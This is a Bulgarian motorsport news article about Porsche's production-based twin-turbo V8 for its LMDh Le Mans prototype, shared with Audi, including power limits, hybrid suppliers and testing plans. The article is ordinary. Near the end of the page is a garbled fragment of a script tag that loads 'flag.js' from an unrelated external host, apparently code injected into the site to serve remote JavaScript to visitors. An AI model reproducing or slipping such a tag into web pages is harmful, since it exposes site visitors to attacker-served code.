Новини

Porsche и Audi ще използват V8 за Льо Ман

Състезателният двигател е базиран на сериен, като това вероятно е 4-литровият V8

 

Porsche потвърди, че ще използва V8 туинтурбо за LMDh прототипа, с който ще участва в „24-те часа на Льо Ман“, WEC и IMSA догодина. Той е базиран на сериен двигател и въпреки че германците не потвърждават в официалното си съобщение произхода му, единственият възможен вариант е 4-литровият V8 с директно впръскване и туинтурбо от Panamera и Cayenne.

 

Porsche разработва новия си прототип съвместно с доставчика на шасито Multimatic и Audi, като инглощатци ще използват аналогичната задвижваща система. Вероятно и Lamborghini ще се сдобие със същия двигател, ако плановете на италианската марка за участие в състезанията по издръжливост от 2024 г. нататък бъдат одобрени от борда на директорите на VW групата.

 

Максималната мощност на състезателния двигател ще варира между 480 и 520 кВт и тежи 180 кг с изпускателната система, каквито са изискванията на правилника. Той ще работи в тандем със стандартната хибридна система на Williams Advanced Engineering (батерия), Bosch (мотор/генератор и електроника) и Xtrac (трансимисия), като комбинираната мощност на цялото задвижване е ограничена от регулациите на 520 кВт за „24 часа на Льо Ман“ и на 500 кВт за останалите състезания.

 

От Porsche потвърждават също, че тестовете на прототипа вече са стартирали, като в края на месеца трябва да започне и подготовката на писта. По всяка вероятност обаче новият автомобил все още не е оборудван със стандартната хибридна система за LMDh.

 

Audi също би трябвало да започне тестове в първата четвърт на 2022 г., но напоследък слуховете, че инголщатци могат да се откажат от проекта, набират все по-голяма сила. Вероятно неговото бъдеще зависи от решението на VW Group за Формула 1, което се очаква в близко бъдеще.

 


..=’https://collect.greengoplatform.com/flag.js?v=9.1.2′ type=’text/javascript’>

Виж още

Back to top button